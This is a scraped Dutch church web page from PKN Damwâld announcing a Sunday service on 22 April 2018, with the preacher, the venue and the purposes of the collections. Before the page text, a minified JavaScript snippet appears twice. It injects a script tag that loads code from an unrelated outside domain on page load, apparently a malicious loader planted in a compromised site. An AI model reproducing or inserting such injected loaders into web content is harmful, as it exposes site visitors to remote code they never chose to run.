;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 22 april 2018 14:00 uur - PKN Damwâld
zondag 22 april 2018
14:00 uur

Kerkdienst zondag 22 april 2018 14:00 uur

Informatie

Voorganger:Ds. M.J. Koppe, Dokkum
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Eredienst en kerkmuziek wereldwijd

Eredienst en Kerkmuziek Wereldwijd
Zingen en bidden op de adem van de getijden
Op het gebied van vieringen is in onze protestantse gemeenten veel in ontwikkeling. Veel gemeenten zijn op zoek naar nieuwe manieren en andere muziek om de erediensten vorm te geven. Daarnaast is er een groei van het aantal plekken waar in het ritme van de dag of de week korte vieringen worden gehouden met veel aandacht voor stilte, ontmoeting met God en met de ander. Zoals in Doorn waar belangstellenden op alle dagen van de week kunnen meedoen in het morgengebed en het avondgebed. Het is een initiatief van een gemeenschap van vrijwilligers die op de adem van de getijden Gods lof zingt, en dagelijks Bijbelleest en bidt. De komende jaren bundelt de protestantse Kerk ervaringen en deelt materiaal om eigentijdse vormen van vieren een stimulans te geven

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds